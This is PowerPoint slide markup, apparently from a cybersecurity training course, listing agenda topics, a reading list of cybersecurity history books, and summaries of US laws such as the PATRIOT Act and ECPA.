            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Networking Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Password Overview &amp; Cracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Network Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142036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F5FEC3-F1C5-4F7F-A805-47202A36F332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612614" y="696084"/>
            <a:ext cx="11039192" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Tubes: A Journey to the Center of the Internet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How the internet is physically constructed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Worm: The First Digital World War</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploring the struggle between the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Worm authors and those who sought to take it down.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Dark Territory: The Secret History of Cyber War</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The history of our government’s efforts to effectively manage our national security in the face of the largely open global communications network established by the World Wide Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>The Code Book</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The history and operation of history’s most famous ciphers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>The Art of Deception</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The many forms of social engineering by renowned hacker Kevin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mitnik</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2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512943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D6FCB0-81EC-409A-B8AC-9987E4C608FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612617" y="698047"/>
            <a:ext cx="11464705" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Countdown to Zero Day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stuxnet and the Launch of the World's First Digital Weapon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How, why Stuxnet was created and its intended target along with a history of the US’s cyber arsenal buildup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Spam Nation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A look inside world of online spammers, who is doing it and who fall victim to spam email advertisements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>The Cuckoo's Egg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tracking a Spy Through the Maze of Computer Espionage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>One of the earliest cases of computer espionage, Stoll tracks an early hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Bytes, Bombs, and Spies:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Strategic Dimensions of Offensive Cyber Operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How the US leverages cyber as part of its defense strategy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="126784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606582" y="2413337"/>
            <a:ext cx="10972800"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Acts, Laws, and Statutes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3927073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Act, Laws &amp; Statutes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="10054390" cy="3970318"/>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Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>PATRIOT Act of 2001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Electronic Communications Privacy Act of 1986 (ECPA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Title III of The Omnibus Crime Control and Safe Streets Act of 1986 (Wiretap Act)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Foreign Intelligence Surveillance Act of 1978 (FISA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Communications Act of 1934</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>General Data Protection Regulation (GDPR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Digital Millennium Copyright Act of 1998 (DMCA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CISA Vulnerability Disclosure Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36466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PATRIOT Act of 2001</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="10972872" cy="2677656"/>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Providing Appropriate Tools Required to Intercept and Obstruct Terrorism Act of 2001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Background:</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USA PATRIOT Act was enacted in response to the attacks of September 11, 2001, and became law less than two months after those attacks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279080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PATRIOT Act of 2001</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="10972872" cy="3046988"/>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General Provisions:</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USA PATRIOT Act modified many major U.S. intelligence, communications, and privacy laws, including:</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The Electronic Communications Privacy Act (EPCA), which modifies Title III of the Omnibus Crime Control and Safe Streets Act (the Wiretap Act);</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the Foreign Intelligence Surveillance Act of 1978 (FISA);</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and the Communications Act of 1934.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48393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PATRIOT Act of 2001</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="11099418" cy="4893647"/>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According to the Department of Justice, the Patriot Act simply expanded the application of tools already being used against drug dealers and organized crime. The act aimed to improve homeland security by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="24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allowing law enforcement to use surveillance and wiretapping to investigate terror-related crimes</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allowing federal agents to request court permission to use roving wiretaps to track a specific terrorist suspect</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allowing delayed notification search warrants to prevent a terrorist from learning they are a suspect</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allowing federal agents to seek federal court permission to obtain bank records and business records to aid in national security terror investigations and prevent money laundering for terrorism financing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99468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PATRIOT Act of 2001</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416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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improving information and intelligence sharing between government agencies</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providing tougher penalties for convicted terrorists and those who harbor them</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allowing search warrants to be obtained in any district where terror-related activity occurs, no matter where the warrant is executed</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ending the statute of limitations for certain terror-related crimes</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making it harder for aliens involved in terrorist activities to enter the United States</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providing aid to terrorism victims and public safety officers involved in investigating or preventing terrorism or responding to terrorist attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230249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Electronic Communications Privacy Act of 1986 (ECPA)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2308324"/>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The Electronic Communications Privacy Act ("ECPA") was passed in 1986 to expand and revise federal wiretapping and electronic eavesdropping provisions. It was enacted to create promote " the privacy expectations of citizens and the legitimate needs of law enforcement." Congress also sought to support the creation of new technologies by assuring consumers that their personal information would remain safe.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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96939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Electronic Communications Privacy Act of 1986 (ECPA)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4524315"/>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Background:</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Electronic Communications Privacy Act and the Stored Wire Electronic Communications Act are commonly referred together as the Electronic Communications Privacy Act (ECPA) of 1986.  The ECPA updated the Federal Wiretap Act of 1968, which addressed interception of conversations using "hard" telephone lines, but did not apply to interception of computer and other digital and electronic communications.  Several subsequent pieces of legislation, including The USA PATRIOT Act, clarify and update the ECPA to keep pace with the evolution of new communications technologies and methods, including easing restrictions on law enforcement access to stored communications in some cases.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273595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Agenda – Day 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="1815882"/>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Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Packet Sniffing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Web Vulnerabilities and Exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Network Reconnaissance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
